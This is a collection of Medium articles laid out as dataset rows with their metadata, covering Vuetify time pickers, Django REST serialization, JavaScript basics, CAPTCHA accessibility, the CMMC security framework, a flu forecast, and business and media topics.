For me personally, I believe in Jeremy Camp’s story / message, but not so much the feature.
166 | DYZRUPT ANNOUNCES THE APPOINTMENT OF AMB. | DYZRUPT LIMITED
DYZRUPT ANNOUNCES THE APPOINTMENT OF AMB. KWAME A.A OPOKU AS DIRECTOR OF COMMUNICATIONS TO LEAD THE NEXT PHASE OF DYZRUPT LTD.
It has been over a year since Dyzrupt LTD was born. The company is positioned to become one of Africa’s, if not one of the world’s, most disruptive technological start-ups of this generation. Dyzrupt’s objective is to foster wealth creation for Africans and others through creative, unconventional approaches that help address local challenges.
The company had a soft launch on September 01, 2019, and its core team and designers have since been working hard behind the scenes, creating a series of arguably some of the most captivating and far-reaching Blockchain-based innovations of this decade.
KWAME A.A OPOKU
As a strategic addition to its core team, the company is bringing on a trailblazer and high-achiever who is an award-winning futurist, Global Business Keynote Speaker, Brand Architect, Entrepreneur, and Social Media/Digital Marketer: Mr. Kwame A. A. Opoku will officially join Dyzrupt as the Director of Communications effective December 01, 2020.
Mr. Opoku is the current CEO of the Reset Global People, which runs successful flagship initiatives, such as Women Entrepreneurship Festival, the African Women CEOs Summit, and Top 100 Women CEOs in Africa; the Vice Chair of West Africa for the Young CEOs Business Forum, which oversees operations in 16 Countries; and is also the founder of the Ghana AI & Blockchain Forum and Co-Founder of the Digital CEO Summit, which runs in 8 African countries.
The company has an ambitious marketing campaign to bring Dyzrupt products and services to a large segment of the more than 1 billion Africans living on the continent. Kwame will summon his expertise and rich international experience to help make Dyzrupt a household name in Africa.
We are Dyzrupt. Liberating Africans. Changing Lives. | https://medium.com/@dyzrupt/dyzrupt-announces-the-appointment-of-amb-cd28555080cf | ['Dyzrupt Ltd'] | 2020-11-24 10:06:02.434000+00:00 | ['Blockchain', 'Blockchain Technology', 'Cryptocurrency', 'Cryptocurrency News', 'Blockchain Startup'] |
167 | Vuetify — Time Pickers. Vuetify comes with a time picker. | Photo by Icons8 Team on Unsplash
Vuetify is a popular UI framework for Vue apps.
In this article, we’ll look at how to work with the Vuetify framework.
Time Pickers
We can add a time picker with the v-time-picker component.
For example, we can use it by writing:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
We add the v-time-picker component to add the time picker.
The color prop sets the color of the heading.
v-model has the time value that’s picked.
Disabled
We can disable the time picker with the disabled prop:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" disabled></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
Now we can’t pick a time.
Read-only
We can make the time picker read-only with the readonly prop:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" readonly></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
We won’t see any style differences from the regular time picker, but we can’t choose a time with it.
24h Format
The format prop lets us change the format of the time.
To change it to 24h format, we write:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" format="24hr"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
Allowed Times
The time that can be picked can be restricted with the allowed-hours and allowed-minutes props:
<template>
<v-row justify="space-around">
<v-time-picker
v-model="time"
:allowed-hours="allowedHours"
:allowed-minutes="allowedMinutes"
class="mt-4"
format="24hr"
scrollable
min="9:30"
max="22:15"
></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: "11:15",
}),
methods: {
allowedHours: (v) => v % 2,
allowedMinutes: (v) => v >= 10 && v <= 50,
},
};
</script>
We have the allowed-hours prop set to the allowedHours function.
It lets us return the condition for the hours that users can pick.
We can have similar functions for minutes and the step.
The v parameter has the hours and minutes.
For example, we can write:
<template>
<v-row justify="space-around">
<v-time-picker v-model="timeStep" :allowed-minutes="allowedStep" class="mt-4" format="24hr"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: "11:15",
timeStep: "10:10",
}),
methods: {
allowedStep: (m) => m % 10 === 0,
},
};
</script>
We have the allowedStep function, which we use as the value of the allowed-minutes prop.
m has the minutes.
Conclusion
We can add a time picker with various restrictions set on it.
Its color can also be changed. | https://medium.com/dev-genius/vuetify-time-pickers-e111e1091618 | ['John Au-Yeung'] | 2020-12-27 18:35:45.693000+00:00 | ['Programming', 'Web Development', 'Technology', 'Software Development', 'JavaScript'] |
168 | AI is making CAPTCHA increasingly cruel for disabled users | Written by Robin Christopherson MBE, Head of Digital Inclusion at AbilityNet
A CAPTCHA, (an acronym for “completely automated public Turing test to tell computers and humans apart”), is a test used in computing to determine whether or not the user is human. You’ve all seen those distorted codes or image-selection challenges that you need to pass to sign up for a site or buy that bargain. Well, improvements in AI means that a crisis is coming … and disabled people are suffering the most.
CAPTCHAs are evil
Whatever the test — whether it’s a distorted code, having to pick the odd-one-out from a series of images, or listen to a garbled recording — CAPTCHAs have always been evil and they’re getting worse. The reason is explained in an excellent recent article from The Verge; Why CAPTCHAs have gotten so difficult. Increasingly smart artificial intelligence (AI) is the reason why these challenges are becoming tougher and tougher. As the ability of machine learning algorithms to recognise text, objects within images, the answers to random questions or a garbled spoken phrase improve month on month, the challenges must become ever-more difficult for humans to crack.
Jason Polakis, a computer science professor at the University of Illinois at Chicago, claims partial responsibility. In 2016 he published a paper showing that Google’s own image and speech recognition tools could be used to crack their own CAPTCHA challenges. “Machine learning is now about as good as humans at basic text, image, and voice recognition tasks,” Polakis says. In fact, algorithms are probably better at it: “We’re at a point where making it harder for software ends up making it too hard for many people. We need some alternative, but there’s not a concrete plan yet.”
We’ve all seen the ‘I am not a robot’ checkboxes that use clever algorithms to decide if the user’s behaviour navigating the website is random enough to be a human. These used to work well — letting us through with that simple checking of the box — but increasingly the bots are able to mimic a human’s mouse or keyboard use and we get the same old challenge of a selection of images popping up as an additional test of our humanity.
The Verge article quite rightly bemoans the place we’ve arrived at — highlighting how difficult these ever-more-obscure challenges are for people with normal levels of vision, hearing and cognitive abilities. We just can’t compete with the robots at this game.
Don’t forget the disabled — we’re people too
But what about all those people who don’t have ‘normal’ abilities? People with a vision or hearing impairment or a learning disability are well and truly thwarted when it comes to CAPTCHAs that test the vast majority of humans to the very limit and beyond. After reading the article, I came away feeling that this very significant group (a fifth of the population and rising) deserve a mention at the very least — after all, they’ve been suffering in the face of these challenges far, far longer than those who do not have a disability or dyslexia (and have been locked out of many an online service as a result).
At the very heart of inclusive design is the ability to translate content from one format into another. For example, if a blind person can’t see text on-screen, it should allow the ability to be converted into speech (that’s how I’m writing this article). If someone can’t easily read a certain text size or font style or in certain colours, then it should allow for resizing or the changing of fonts and colours — this is all basic stuff that most websites accommodate quite well. Images should be clear and their subject easy to understand — and they should include a text description for those who can’t see it at all. Audio should be clear. All aspects of ‘Web Accessibility 101’.
The whole point of CAPTCHA challenges is to allow for none of these. No part of the challenge can be machine-readable or the bots will get in. Text can’t be plain text that can be spoken out by a screenreader for the blind — it has to be pictures of characters so excruciatingly garbled that no text-recognition software can crack it. Ditto with an audio challenge. Pictorial challenges must be so obscure that object recognition software can’t spot the distant traffic lights amongst the foliage etc, etc. It has ever been thus.
Today the road signs need to be obscured by leaves because the bots are better than ever at recognising them — but five years ago the images were still chosen to be just complex enough so as to thwart the bots of the day. And because the bots are using the same machine-learning AI as the assistive software used by disabled people to convert content into a form that is understandable to them, they were locked out too.
Did I mention? — CAPTCHAs are evil
So long as websites want to keep the bots from registering spam accounts or posting bogus comments, there will need to be some way for developers to detect and deflect their attempts. The use of CAPTCHA challenges, however, is not and has never been a fair (or even legal) one. It discriminates and disenfranchises millions of users every day.
So, whilst the article neglects to mention the significant segment of users most egregiously affected by CAPTCHAs, I’m hopeful that its main message — namely that this arms-race is rapidly reaching a point where the bots consistently beat humans at their own game — is a herald of better times to come.
As CAPTCHAs actually begin to capture the humans and let the bots in, then they begin to serve the opposite objective to that intended. They should then disappear faster than a disillusioned disabled customer with money to spend but wholly unable to access your services.
So what’s the alternative?
Companies like Google, who have long provided commonly-used CAPTCHA services, have been working hard on a next-generation approach that combines a broader analysis of user behaviour on a website. Called reCAPTCHA v3, it is likely to use a mix of cookies, browser attributes, traffic patterns, and other factors to evaluate ‘normal’ human behaviour — although Google are understandably being cagey about the details.
So hopefully by now you get the bigger picture. Hopefully you’re saying to yourself, “Ah, but will the clever analysis cater for users who aren’t so average or will they once again be excluded by not being ‘normal’ enough?” Excellent question — I’m glad you’re on your game and on-board.
For example, will I, as a blind keyboard-only user of a website, be flagged as a bot and banished? Will a similar fate befall switch users (like the late and much missed Prof Stephen Hawking) who use certain software settings to methodically scan through a page. Dragon users issue voice commands that instantly move the mouse from one position to another in a very non-human way. I could go on.
I hope you get the picture. Moreover, I hope that Google and other clever types working on the issue elsewhere get the picture too. They certainly haven’t to date.
Originally posted here
More thought leadership | https://medium.com/digital-leaders-uk/ai-is-making-captcha-increasingly-cruel-for-disabled-users-1c0c994934ef | ['Digital Leaders'] | 2019-02-22 16:01:23.231000+00:00 | ['Artificial Intelligence', 'Online', 'Technology', 'Captcha', 'Accessibility'] |
169 | Web Development in Python: Django Rest Framework: Serialization, Requests, and Response | Add Django Rest Framework
Install Django Rest Framework:
pip install djangorestframework
Add then add rest_framework in INSTALLED_APPS array:
INSTALLED_APPS = [ ... 'home', 'rest_framework' ]
Add Models
Run the following commands to create and apply the migrations (makemigrations first, then migrate):

python3 manage.py makemigrations

python3 manage.py migrate
You can learn more about models here.
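The models.py file itself is only linked, not shown; based on the three fields referenced later (topic, author, body), a minimal sketch might look like the following — the field types and max_length values are assumptions, not taken from the article:

```python
# home/models.py — hypothetical reconstruction; field types and lengths are assumptions
from django.db import models

class Post(models.Model):
    topic = models.CharField(max_length=100)
    author = models.CharField(max_length=100)
    body = models.TextField()

    def __str__(self):
        # Display the topic in the Django admin list view
        return self.topic
```

This is a Django app fragment, so it runs inside a project rather than as a standalone script.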
Serialization
In DRF, serializers are responsible for converting complex data such as querysets and model instances into native Python datatypes (a process called serialization) that can then be easily rendered into JSON, XML, or other content types consumed by the front-end.

Serializers are also responsible for deserialization, which means they allow parsed data to be converted back into complex types, after first validating the incoming data.
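The round trip that serializers perform can be illustrated with the standard library alone. This is not DRF code — just a sketch of the underlying idea: a complex object becomes a native dict (serialization), the dict becomes JSON, and the process reverses on the way back (deserialization):

```python
import json

class Post:
    def __init__(self, topic, author, body):
        self.topic, self.author, self.body = topic, author, body

# Serialization: complex object -> native Python dict -> JSON string
post = Post("DRF", "Saranjeet", "Serializers explained")
native = {"topic": post.topic, "author": post.author, "body": post.body}
json_data = json.dumps(native)

# Deserialization: JSON string -> native dict -> object again
parsed = json.loads(json_data)
restored = Post(**parsed)
print(restored.topic)  # DRF
```

DRF adds the piece this sketch skips: validating the incoming data before rebuilding the complex type.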
Serializer Class
A serializer class is very similar to Django Forms and ModelForm class and includes similar validation flags on the various fields, such as required, max_length, default, etc.
We have our database with 3 fields (topic, author, body). However, we need to make some adjustments in order to take data from the user, store it in the database, convert it into JSON, and send it back to the front-end. In technical terms, the complex data type (in the form of a model instance) is first converted into a native Python data type, and later this is converted to JSON data.
Add serializers.py
line 1: we are importing the serializers module from rest_framework.
line 2: we are creating a class name PostSerializers, which is inheriting from the Serializer class inside of the serializers module.
line 3,4,5: if you ever made forms in Django, you would see this is very similar to forms. We are creating the instances of the same fields as in our models.py file.
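The serializers.py listing itself did not survive extraction; reconstructed from the line-by-line description above (the import on line 1, the PostSerializers class on line 2, and the three fields on lines 3–5), it would look roughly like this — the max_length values are assumptions:

```python
# home/serializers.py — reconstructed sketch; max_length values are assumptions
from rest_framework import serializers

class PostSerializers(serializers.Serializer):
    topic = serializers.CharField(max_length=100)
    author = serializers.CharField(max_length=100)
    body = serializers.CharField(max_length=1000)
```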
Add views.py
line 1: Importing the render method.
line 2: importing Post model from models.py file
line 3: importing PostSerializers
line 4: Importing JSONRender so we can convert the data to JSON type.
line 5: importing the HttpResponse just to display the output.
line 8: creating a functional view, which takes request as an argument.
line 9: new_post variable stores the object with id = 1 only.
line 10: we are serializing the new_post variable and storing that object in the serializer variable.
line 11: json_data variable storing the data as JSON, the JSONRenderer renders the request data into JSON.
line 12: it returns the value of the function as an HttpResponse in the form of JSON
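The views.py listing is likewise missing; a sketch consistent with the line-by-line description above would be as follows — the view name post_detail is an assumption taken from the file name mentioned in the article:

```python
# home/views.py — reconstructed from the description; the view name is an assumption
from django.shortcuts import render                 # line 1
from .models import Post                            # line 2
from .serializers import PostSerializers           # line 3
from rest_framework.renderers import JSONRenderer  # line 4
from django.http import HttpResponse               # line 5

def post_detail(request):                           # line 8
    new_post = Post.objects.get(id=1)               # line 9: only the object with id=1
    serializer = PostSerializers(new_post)          # line 10: serialize the model instance
    json_data = JSONRenderer().render(serializer.data)  # line 11: render native data to JSON bytes
    return HttpResponse(json_data, content_type='application/json')  # line 12
```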
We can add a few lines to our detail function (post_detail.py) to show what is going on behind the scenes.

You can check your terminal to see what these variables (new_post, serializer, json_data) print. It will be fun!!
Add urls.py
Just add the endpoint for the views we have created in the ecom/urls.py file.
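A minimal ecom/urls.py consistent with that instruction might be the following — the route path and view name here are assumptions:

```python
# ecom/urls.py — hypothetical wiring; route path and view name are assumptions
from django.contrib import admin
from django.urls import path
from home import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('post/', views.post_detail, name='post_detail'),
]
```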
Add data to your table by going to http://127.0.0.1:8000/admin/home/post/ and click on the ADD POST button. | https://medium.com/python-in-plain-english/web-development-in-python-django-rest-framework-serialization-requests-and-response-88a5bf6a5752 | ['Saranjeet Singh'] | 2020-11-19 16:13:21.529000+00:00 | ['Coding', 'Programming', 'Python', 'Web Development', 'Technology'] |
170 | Now, More Than Ever: Supply Chain Security — Unpacking The CMMC With Katie Arrington And Yolanda Craig | It should be evident by now that Information security should be a core value to any organization — and even more so for those that interact with government entities — and furthermore for those that operate within the government defense space.
It’s easy to say. But even for those that want to honestly act on this objective, how can they make “this” actually happen?
Good question indeed. This is precisely the one we are going to try to answer in this podcast.
Organizations can meet the letter of the law, or regulation, or standard. Checkbox process — done.
They can bring it to the front of the process and perform a risk assessment. Scenario documentation — done.
But what about the middle bit where a lot of the critical thinking takes place and where the controls get defined; where the organization not only claims they “take security seriously” but can also prove it?
How does an organization bridge this gap in a way that actually addresses the risk throughout the government’s entire supply chain?
This is where the Cybersecurity Maturity Model Certification (CMMC) comes into play. And looking at the most recent events, evidently, not a moment too soon.
Now it is the time to go ahead and learn what the CMMC is.
From the CMMC site:
The Office of the Under Secretary of Defense for Acquisition and Sustainment (OUSD(A&S)) recognizes that security is foundational to acquisition and should not be traded along with cost, schedule, and performance moving forward. The Department is committed to working with the Defense Industrial Base (DIB) sector to enhance the protection of controlled unclassified information (CUI) within the supply chain.
OUSD(A&S), working with DoD stakeholders, University Affiliated Research Centers (UARCs), Federally Funded Research and Development Centers (FFRDC), and industry, developed the Cybersecurity Maturity Model Certification (CMMC) framework.
The CMMC will review and combine various cybersecurity standards and best practices and map these controls and processes across several maturity levels that range from basic cyber hygiene to advanced. For a given CMMC level, the associated controls and processes, when implemented, will reduce risk against a specific set of cyber threats.
The CMMC effort builds upon existing regulation (DFARS 252.204–7012) that is based on trust by adding a verification component with respect to cybersecurity requirements.
The goal is for CMMC to be cost-effective and affordable for small businesses to implement at the lower CMMC levels.
Authorized and accredited CMMC Third Party Assessment Organizations (C3PAOs) will conduct assessments and issue CMMC certificates to Defense Industrial Base (DIB) companies at the appropriate level.
This text above provides a decent overview. But you likely have some questions. If you want to learn more about CMMC, DFARS, C3PAOs, and DIB; and, if you want to hear how CMMC and NIST connect together; and, if you want to hear how the CMMC can be leveraged to improve (and demonstrate) your organization’s cybersecurity posture, then this episode is for you.
I had the distinct honor of bringing together two industry leaders that know the CMMC inside and out: Katie Arrington, CISO A&S at United States Department of Defense responsible for bringing the CMMC to light; and Yolanda Craig, a former manager of Cyber Information Technology) at the US DoD and now helping government contractors be cyber-ready.
This happens to be a very timely discussion given the recent cyber revelations for the American government supply chain. I would encourage EVERY organization (not just those supplying the government with products and services) to listen to this episode.
Now, more than ever, we need supply chain security. Now, more than ever, knowledge is power. Grab some here and share with far and wide.
Guest(s)
Katie Arrington, CISO A&S at United States Department of Defense
Yolanda Craig, VP, Cyber Strategy, Everwatch Solutions | Former Manager (Cyber Information Technology), US DoD
This Episode’s Sponsors:
Nintex: https://itspm.ag/itspntweb
Imperva: https://itspm.ag/imperva277117988
RSA Security: https://itspm.ag/itsprsaweb
Resources
CMMC: https://www.acq.osd.mil/cmmc/index.html
CMMC Accreditation Body: https://www.cmmcab.org/
CMMC Assessment Guide: https://www.acq.osd.mil/cmmc/draft.html
To see and hear more Redefining Security content on ITSPmagazine, visit:
https://www.itspmagazine.com/redefining-security
Are you interested in sponsoring an ITSPmagazine Channel?
https://www.itspmagazine.com/podcast-series-sponsorships | https://medium.com/itspmagazine/now-more-than-ever-supply-chain-security-unpacking-the-cmmc-with-katie-arrington-and-yolanda-37c3547fb295 | ['Itspmagazine Podcast'] | 2020-12-21 15:57:02.838000+00:00 | ['Government', 'Hacking', 'Supply Chain', 'Cybersecurity', 'Technology'] |
171 | Are Learning Apps Helping Or Hurting Education For Children? | Our formative years build the basis on which our success in life will be determined. These formative years also provide us with basic life skills such as reading, writing, calculating, and communicating effectively. Every parent needs to ensure that their child gets the best education possible during this period to ensure that they succeed in life.
However, with the world turning to tech for almost everything and tablets, smartphones, and digital learning aids on the rise for children as young as 5, should parents be concerned about enhanced screen time and its impact on learning? Let’s find out.
Learning methodologies in children
Children learn in many different ways. These learnings are visual, auditory, or sensory. Children also learn at their own pace, regardless of the pace their class is going at. Digital devices take advantage of this and offer learners the capability to learn at their own pace and not try to match the rate of instruction of their teacher. This also encourages little children to understand self-learning better. Children with disabilities such as dyslexia and autism can be helped by apps to develop social skills and make progress at their own pace without public scrutiny or being subjected to ridicule or judgment.
To learn more, explore the impact of self-learning for very young children and the advantages and disadvantages of using apps in education. | https://medium.com/@harshit-31039/are-learning-apps-helping-or-hurting-education-for-children-5ec334b646e2 | ['Harshit Shukla'] | 2020-12-18 10:28:50.535000+00:00 | ['Education Technology', 'Mobile Apps', 'Education', 'Mobile App Development', 'Education Reform']
172 | Print or Digital Media — The Battle is Far From Over | The digital transformation has radically altered the publishing industry. Many people believe that the emergence of eBooks, audiobooks, and online news marks the impending death of the printed word. But is print media truly on its way to becoming a museum piece or will it prove to be resilient in the face of the digital era?
Virtually everyone agrees that the digital transformation of the media industry is already well underway. Consumer behavior and expectations are driving this change, and younger generations in particular are accustomed to instant access to global content at all times. The rapid rise of mobile and other technologies has reshaped the manner in which the world creates and consumes information, and this change is profoundly affecting the media sector. The relative affordability of mobile technology is another catalyst for the digital transformation, as it allows a growing number of consumers to utilize the latest tools in their quest to enjoy content.
The Impact of Digital Transformation in the Media and Entertainment Sector report, produced by Econsultancy in partnership with Adobe, notes that an incredible 97% of media companies surveyed believe that the digital transformation has disrupted their sector. At the same time, only 44% see themselves as being part of the disruption and helping to lead the way to a new approach. To close this gap, we recommend that instead of viewing digitalization as a threat, media enterprises should integrate their content into high-quality user experiences, including customized content, more relevant and personalized advertisements, and other innovative methods to successfully compete in the modern ecosystem.
While there’s no question that the digital transformation has permanently changed the media industry, reports of the death of print have been greatly exaggerated. The reality is that the tangible nature of physical media remains important to a large percentage of consumers.
Books
According to a 2016 Pew Research Center survey, 65% of Americans have read a print book in the last 12 months, which is more than double the 28% share who had read an e-book in the same period, and more than four times the 14% who had listened to an audiobook. Clearly, printed books are alive and well.
Magazines
The numbers show that physical copies are still an essential part of the magazine landscape, with the top U.S. magazine, AARP The Magazine, having a circulation of over 23 million. And some luxury publishers, such as Monocle, Hodinkee, and Goop, have recently launched new print magazine offerings, further illustrating the continued resilience of the printed word.
Newspapers
According to data collected by Scarborough, a market research company owned by Nielsen, for the 51 largest American newspapers the print edition reaches 28% of circulation areas, while the digital version only reaches 10%. Digital readers don’t stick around. Data from Pew Research Center indicates that people going directly to news websites stay for less than five minutes on average, while readers coming from Facebook leave in less than two minutes. Pew’s data shows that print-only remains the most popular way to digest news, with more than half of the people surveyed reading a printed newspaper every day.
While the digital transformation is definitely happening, print remains an integral part of our communities. However, the fact that print advertising is declining is indisputable. Newspaper ad revenues in the U.S. fell by 12% in 2016, down to $12 billion, while American magazine ad revenues dropped by 9% to $8.5 billion. Ten years ago, newspaper advertising represented $43 billion and magazine ads were at $19 billion, according to research published by Magna Global.
So, yes, the power of print has undoubtedly declined due to the proliferation of digital media and technological advancements. And while traditional print mediums still have their audience, it’s essential that they evolve to ensure a prosperous future.
How can publishers remain relevant?
Firstly, it’s important to understand and leverage data through human insights. To effectively engage an audience in the current landscape, data must be used not only to serve or optimize content but also to assist in the process of content creation. By developing innovative ways to interpret and apply this data, media companies can use their understanding of consumers to create new products that meet or exceed the expectations of today’s readership. The digital transformation cannot be ignored. Instead, media enterprises must develop a clear strategy around mobile, video, social media, analytics, and the user experience. By devising agile operating models capable of leveraging the power of digital means for syncing content generation and delivery, the media industry can continue to thrive as consumer expectations shift.
In a world where information is much more accessible but far less reliable than it used to be, the potential for print to thrive remains strong. And the human attachment to physical books, newspapers, and magazines is undeniable. At the same time, it appears clear that digital media is poised to dominate in the future, as the number of purely digital media offerings is multiplying. But always remember: technology isn’t going to kill print media. When used effectively, technology can help digital and print in different ways, allowing both to thrive as we move forward in the ever-changing landscape of the media world. | https://medium.com/the-mission/print-or-digital-media-battle-is-far-from-over-5743aae4da71 | [] | 2019-08-05 15:46:05.575000+00:00 | ['Media', 'Digital Media', 'Publishing', 'Technology', 'Books'] |
173 | Flu forecasted to be historically low as COVID-19 cases surge | Earlier this fall there was talk of a potential “twindemic” — where the coronavirus pandemic collides with the flu season. With our hospitals and healthcare system already stressed beyond their capacity, it’s not surprising health officials have been concerned with the possibility of treating severe flu cases on top of those admitted with COVID-19.
The good news: Kinsa data is predicting an abnormally mild flu season. I recently spoke with Donald McNeil, Jr. from The New York Times about Kinsa’s flu forecast and shared with him what I’m sharing here: Here we are in December with overall illness levels hovering below 1% — just last year, in comparison, illness levels were peaking at nearly 6% of the US population sick.
Overall, contagious illness is much lower this year than usual, likely due to a combination of factors:
Minimal air travel from the southern hemisphere this summer may have reduced the import of the virus to the US
Social distancing, school and workplace closures, and fewer indoor events limit the virus's ability to jump between individuals
Increased mask wearing reduced the level of viral transfer between individuals
By way of example, these maps show the overall level of illness across the US on Dec. 8, 2019 and on Dec. 8, 2020.
This in no way means that we’re out of the woods and that caution isn’t still absolutely necessary. Please continue to wear a mask, practice social distancing and do what you can to avoid group events or activities. While a light flu season is a welcome piece of good news, the reality is that our system is already at a breaking point. Our families and communities depend on our adherence to these practices.
If you’re wondering what your local flu risk is, I’ve been checking Kinsa’s local health weather often for my risk score. You can see yours here.
How Kinsa calculates illness levels: Kinsa aggregates infectious illness levels in real time through our broad network of smart thermometers and the connected mobile triage app. We use this anonymous information to estimate the percentage of the population afflicted with febrile illness (most commonly cold & flu) throughout the US. External academics have validated in peer-reviewed research Kinsa’s localized illness detection and forecasting, including the flu 12–20 weeks in advance, and up to a 3-week leading indicator for COVID-19. | https://medium.com/@inder-singh/flu-forecasted-to-be-historically-low-as-covid-19-cases-surge-cba0c38cc4d7 | ['Inder Singh'] | 2020-12-13 16:15:58.357000+00:00 | ['Coronavirus', 'Health Technology', 'Public Health', 'Covid 19', 'Pandemic'] |
174 | JavaScript Basics — Simple Value Types and Operators | Photo by Dan Gold on Unsplash
JavaScript is one of the most popular programming languages in the world. To use it effectively, we’ve to know about the basics of it.
In this article, we’ll look at the basic value types and operators.
Values
Values are the most basic types of data in a JavaScript program.
They’re stored as bits on the computer in memory.
We’ve to store values so that we can work with them later in the program.
Numbers
Numbers are the most basic data type. They store simple numeric values.
There’s no difference between floating-point and integer types.
They are all stored in one data type.
The numbers in JavaScript are 64 bit. This means that there are 64 binary digits or 2 raised to the 64th power number of numbers.
Some bits are used to store the decimal point.
This means that it can actually represent up to about 9 quadrillion whole numbers, positive or negative.
The main thing we do with numbers are arithmetic.
We can use operators to do operations with numbers.
For instance, we can write:
1 + 3
or
2 * 3
+ and * are operators. + is for addition and * is for multiplication.
We can prioritize operations with parentheses.
For instance, we can write:
(1 + 3) * 2
to prioritize addition over multiplication.
Without parentheses, multiplication would go first.
Subtraction is done with the - operator and division is done with the / operator.
When there’re no parentheses in an arithmetic expression, then the precedence of the operators is applied by the regular rules of math.
* and / have precedence over + and - .
% stands for the remainder operator.
1 % 2 means that we get the remainder of dividing 1 by 2.
Therefore, 1 % 2 returns 1.
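As a quick sketch, the arithmetic above can be checked in any JavaScript console (the expressions are taken from the examples in this section):

```javascript
// Arithmetic operators and precedence
console.log(1 + 3);       // 4
console.log(2 * 3);       // 6
console.log((1 + 3) * 2); // 8 — parentheses are evaluated first
console.log(1 + 3 * 2);   // 7 — * has precedence over +
console.log(7 / 2);       // 3.5 — one number type, so no integer division
console.log(1 % 2);       // 1 — remainder of dividing 1 by 2
```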
Special Numbers
There are some special values in JavaScript that are considered numbers but they don't act like normal numbers.
Infinity and -Infinity represent positive and negative infinite values.
Infinity - 2 is still Infinity .
We shouldn’t trust these values too much.
NaN stands for ‘not a number’. However, it’s still of type number.
We’ll get this result when we try to calculate 0 / 0 , Infinity - Infinity , or any other numeric operation that doesn’t yield a meaningful result.
Strings
Strings are another basic data type. It’s used to represent text.
They’re written by enclosing quotes.
We can use single quotes, double quotes, or backticks to enclose a string.
As long as the starting and ending delimiter match, we can use any of them.
For example, we can write:
'hello world'
or:
"hello world"
or:
`hello world`
If the backslash character is found in the quoted text, then it’s used for escaping the character.
It won’t be displayed and it’s used to write special characters like newline or tabs.
For instance, we can write:

'hello\nworld'

where \n is the newline character.
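A few more common escape sequences, as a small illustrative sketch (the \t and \\ examples are additions, not from the text above):

```javascript
// Backslash escapes inside quoted strings
console.log('line one\nline two'); // \n inserts a newline
console.log('col1\tcol2');         // \t inserts a tab
console.log('It\'s escaped');      // \' lets a quote appear inside single quotes
console.log('a\\b');               // \\ produces a single literal backslash
```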
Strings are also stored as a series of bits on a computer.
They’re encoded into the Unicode character set and then stored on the computer.
Unicode has almost every character we would ever need from any language like Greek, Japanese, numbers, in addition to English characters.
Strings can’t be divided, multiplied, or subtracted, but + can be used on strings for concatenation.
For instance, we can write:
'hello' + 'world'
Strings in double-quotes act the same as if they’re wrapped in single quotes.
Template literals can do a few more tricks. They’re the strings enclosed by backticks.
We can embed expressions into them. For example, we can write:
`half of 50 is ${50 / 2}`
Then we get:
`half of 50 is 25`
as the final result.
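Concatenation and template literals can be seen side by side in a quick sketch (the name variable is an illustrative addition):

```javascript
const name = 'world';
console.log('hello' + ' ' + name);      // 'hello world' — + concatenates strings
console.log(`half of 50 is ${50 / 2}`); // 'half of 50 is 25' — ${} embeds any expression
console.log(`2 + 2 = ${2 + 2}`);        // '2 + 2 = 4'
```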
Unary Operators
Unary operators operate on one operand.
One of them is the typeof operator for checking the type of a value.
For instance, we can write:
typeof 10
to get 'number' and:
typeof 'y'
to get 'string'.
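A quick sketch of typeof applied to a few values from this article:

```javascript
// typeof takes a single operand and returns a string naming the type
console.log(typeof 10);         // 'number'
console.log(typeof 'y');        // 'string'
console.log(typeof (7 / 2));    // 'number' — there is no separate float type
console.log(typeof `template`); // 'string' — backtick strings are ordinary strings
```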
Photo by Merve Aydın on Unsplash
Binary Operators
Operators that take 2 operands are called binary operators. They’re the ones like the arithmetic operators.
Conclusion
Numbers and strings are the basic types of data, and a large range of numbers can be stored.
We can work with numbers using various operators. Strings are encoded with Unicode so that we can store lots of different characters.
Unary operators take one operand.
| https://medium.com/javascript-in-plain-english/javascript-basics-simple-value-types-and-operators-341c205ba5f4 | ['John Au-Yeung'] | 2020-06-14 17:10:06.726000+00:00 | ['Technology', 'Software Development', 'JavaScript', 'Programming', 'Web Development']
175 | Buyer personas in retail | Back in the days, before the Internet, customer-retailer relationship was different. When a customer bought something, they had to bear significant risk if a product did not meet their expectations. Nowadays, the buying process has completely changed. Retailers have to invest in customer satisfaction. Customers have a lot of information and choice at their fingertips. They can browse through different suppliers, and can easily return products. It is important that retailers differentiate themselves from their competition and focus on their own strengths and unique selling points. Most importantly, they need to find smart ways to stay relevant and fulfil their customers’ needs.
Buyer Personas in retail
As retailer, you have to offer the right product to the right person, both online and offline, to create and maintain traction. For every marketing strategy, it is crucial to know what your target group is, as well as what drives and motivates them. It is important to understand how they make a decision to purchase. To better understand this, you can create Buyer Personas. Buyer personas can help you understand customers according to their emotions and behaviour.
What is a buyer persona?
A buyer persona is a semi-fictional representation of your target group, which allows you to put a face to data. A buyer persona does not represent your ideal customer, it represents the corresponding purchase behaviour of your customers. Every company has their own unique persona or multiple personas. A company usually creates around 2 or 3 primary buyer personas, based on their target groups, with each persona representing one target group.
The strongest personas are based on data, market research and your own insights. You should conduct desk research, research statistics of the communication channels, hold surveys, and interview your target group. You can also create secondary personas, which are focused on the characteristics of a particular branch or market segment. The behavior and the goals of those secondary personas are the same as of the primary personas.
How to create a Buyer Persona for your retail
To set up a good profile for your buyer persona, you should research the following components:
Characteristics: to understand your customer throughout
Scenarios: to understand the how and why of their buying decision
Gaps: to understand where they are now and where they want to go
Bridge: to understand what they need to bridge this gap
Goal: to understand what the customer wants to achieve
The right marketing content
Buyer personas should inspire you to produce relevant marketing content that appeals to your target group. Communication between you and your customers will be enriched by using the information of a buyer persona, because it allows you to accurately align your message with your target group. It is key to develop different buyer persona- specific content to approach your target group in an effective way.
Allocate marketing budget efficiently
